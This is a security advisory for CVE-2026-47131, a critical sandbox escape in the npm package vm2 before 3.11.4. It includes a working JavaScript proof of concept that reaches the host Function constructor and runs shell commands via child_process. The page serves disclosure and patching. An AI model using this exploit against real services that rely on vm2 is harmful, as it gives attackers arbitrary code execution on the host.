CVE-2026-47131

CRITICAL10.0

vm2 has a Sandbox Escape issue

Published: 5/29/2026Modified: 5/29/2026

Description

### Summary By combining `Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__")`, `Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__")`, and Node.js's `ERR_INVALID_ARG_TYPE` Error, the host's `TypeError` constructor can be obtained, which allows the escape from the sandbox. This allows attackers to run arbitrary code. ### PoC ```js "use strict"; const { VM } = require("vm2"); const vm = new VM(); vm.run(` "use strict"; const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"); const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"); async function f() { try { await WebAssembly.compileStreaming(); } catch(e) { setProto.call(getProto.call(e), null); } try { await WebAssembly.compileStreaming(); } catch(e) { const HostFunction = e.constructor.constructor; new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" }); } } f(); `); ``` ### Impact Sandbox Escape → RCE

Affected packages (1)

npm/vm2from 0, < 3.11.4

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	CRITICAL10.0	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

Affected packages (1)

CVSS scores

References (4)